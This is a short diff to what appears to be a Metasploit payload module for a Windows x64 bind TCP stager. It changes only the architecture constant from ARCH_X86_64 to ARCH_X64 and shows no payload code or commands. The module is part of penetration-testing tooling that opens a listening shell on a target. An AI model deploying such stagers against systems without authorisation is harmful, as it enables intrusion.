@@ -25,7 +25,7 @@ module MetasploitModule
       'Author'      => [ 'sf', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
-      'Arch'        => ARCH_X86_64,
+      'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::BindTcp,
       'Convention'  => 'sockrdi',
       'Stager'      => { 'RequiresMidstager' => false }
